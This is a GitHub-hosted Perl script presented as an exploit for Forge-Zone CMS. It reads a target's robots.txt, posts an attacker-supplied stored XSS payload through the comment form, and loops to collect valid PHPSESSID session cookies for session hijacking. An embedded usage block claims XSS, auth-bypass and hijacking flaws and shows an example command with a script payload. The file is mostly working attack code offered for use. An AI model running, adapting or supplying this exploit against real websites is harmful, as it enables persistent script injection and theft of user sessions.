-
Notifications
You must be signed in to change notification settings - Fork 63
/
ForgeZoneCMS_Exploit.pl
121 lines (83 loc) · 3.03 KB
/
ForgeZoneCMS_Exploit.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#!/usr/bin/perl -Uw
use 5.010;
use strict;
use File::Fetch;
use diagnostics;
use Pod::Usage;
use Getopt::Long;
use Data::Dumper;
use HTTP::Cookies;
use LWP::UserAgent;
use Term::ANSIColor;
BEGIN:
my $options = GetOptions(
'payload|p=s' => \my $Payload,
'target|t=s' => \my $Target,
);
pod2usage(1) if(not defined($Payload && $Target));
my $cookie_jar = HTTP::Cookies->new(
file => "cookie.txt",
autosave => 1,
ignore_discard => 1,
);
my $UserAgent = LWP::UserAgent->new;
$UserAgent->cookie_jar( $cookie_jar );
say colored("\n[*] Target: $Target\n",'blue');
say colored("[+] Reading robots.txt file to find other targets...",'yellow');
my @Uri=split("/",$Target);
File::Fetch->new
(
uri => "http://$Uri[2]/robots.txt")->
fetch(to => \(my $file)
);
say($file);
say colored("\n[*] Sending XSS payload\n",'yellow');
my $response = $UserAgent->post($Target,
Content_Type => 'form-data',
Content => [
'action' => "ajouterComment",
'id' => 3,
'data' => $Payload,
]
);
my $content = $response->decoded_content();
say colored ("[*] Now collecting 40 valids PHPSESSID in DataBase...",'blue');
for(my $i=1;$i<=40;$i++){
my $ua = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new();
$cookies->set_cookie(0,'phpsessid', "Giveme_phpsessid.$i",'/',$Uri[2],80,0,0,86400,0);
$ua->cookie_jar($cookies);
my $Request = $ua->post($Target,
Content_Type => 'form-data',
Content => [
'action' => "ajouterComment",
'id' => 3,
'data' => "XXX",
]
);
my $Output= $Request->decoded_content();
my $ValidPhpSessid= $cookies->as_string;
my @PhpSessIdCollected = split(/;/, $ValidPhpSessid);
$PhpSessIdCollected[0] =~ s/Set-Cookie3://g;
say colored($PhpSessIdCollected[0],'green');
}
=info
[1] Description:
Forge-Zone CMS multiple vulnerabilities:
- Persistant XSS
- Auth Bypassing
- Session HiJacking
Forge-Zone url: http://forge-zone.fr
[2] Example:
perl fab.pl --target=http://vulnerable-site.com/#\!/blogletter/article/3 --payload=<script>MY XSS</script>
[3] Contact (to whip me \o/):
-Emails:
kmkz[at]tuxfamily[dot]org (for fun)
mail[dot]bourbon[at]gmail[dot]com
-Tweeter: kmkz_security
-linkedin:
[FR] linkedin.com/pub/jean-marie-bourbon/56/928/469
[EN] linkedin.com/pub/jean-marie-bourbon/56/928/469/en
-IRC nickname: kmkz
=cut
__END__